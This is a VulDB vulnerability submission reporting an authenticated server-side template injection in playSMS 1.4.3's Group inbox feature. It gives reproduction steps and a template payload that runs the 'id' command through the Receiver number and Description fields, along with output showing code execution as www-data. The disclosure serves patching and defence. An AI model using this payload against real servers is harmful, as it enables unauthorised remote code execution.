| Título | playSMS 1.4.3 Server Side Template Injection (SSTI) |
|---|
| Descrição | PlaySMS 1.4.3 has authenticated Server Side Template Injection in Group inbox. The manipulation of the argument "Receiver number" and "Description", that leads to a Authenticated RCE
1. Authenticate in login page http://192.168.1.20/playsms/index.php?app=main&inc=core_auth&route=login
2. Features > Group inbox (/index.php?app=main&inc=feature_inboxgroup&op=list)
3. Click in Plus (+) icon to add new group
4. Add payload {{`id`}} in "Receiver number" and "Description field
5. Save and back to Features > Group inbox
Also we can click in action edit to view Description RCE
<tr><td class=label-sizer>Receiver number</td><td>uid=33(www-data) gid=33(www-data) groups=33(www-data)
</td></tr>
<tr><td>Keywords</td><td><input type='text' name='keywords' value='' maxlength='100'><i class='glyphicon glyphicon-info-sign playsms-tooltip' data-toggle=tooltip title='Separate with comma for multiple items' rel=tooltip></i></td></tr>
<tr><td>Description</td><td><input type='text' name='description' value='uid=33(www-data) gid=33(www-data) groups=33(www-data)
' maxlength='100'></td> |
|---|
| Fonte | ⚠️ https://github.com/playsms/playsms/tree/master/storage/application/plugin/feature/inboxgroup |
|---|
| Utilizador | Dhimitri (UID 45045) |
|---|
| Submissão | 25/06/2024 01h15 (há 2 anos) |
|---|
| Moderação | 03/07/2024 07h29 (8 days later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 270278 [playSMS 1.4.3 Template index.php?app=main&inc=feature_inboxgroup&op=list Receiver Number Elevação de Privilégios] |
|---|
| Pontos | 20 |
|---|